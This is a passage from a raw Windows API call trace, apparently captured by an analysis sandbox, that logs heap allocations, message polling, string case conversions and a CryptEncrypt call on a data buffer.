lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.588] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0196.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.589] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0196.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.589] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.590] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.590] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.590] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4ef8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.594] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x174f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x1750) returned 1 [0196.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.595] CharLowerBuffW (in: lpsz="byte[5968]", cchLength=0xa | out: lpsz="byte[5968]") returned 0xa [0196.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.595] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.595] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.595] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.595] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a4ef8*, pdwDataLen=0x8bef68*=0x174f, dwBufLen=0x1750 | out: pbData=0x34a4ef8*, pdwDataLen=0x8bef68*=0x1750) returned 1 [0196.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.595] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.596] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.596] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.596] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.596] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.596] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.596] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.596] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.596] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.596] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.597] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.597] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.597] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.597] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.597] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.600] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.600] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.600] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.601] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.601] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.602] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0196.602] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.602] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0196.602] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.602] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.602] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.602] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.602] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.602] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.602] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0196.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.602] CryptDestroyKey (hKey=0xaa5660) returned 1 [0196.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.603] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.603] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.603] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0196.603] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.603] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0196.603] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.604] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0196.604] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.604] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0196.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.604] 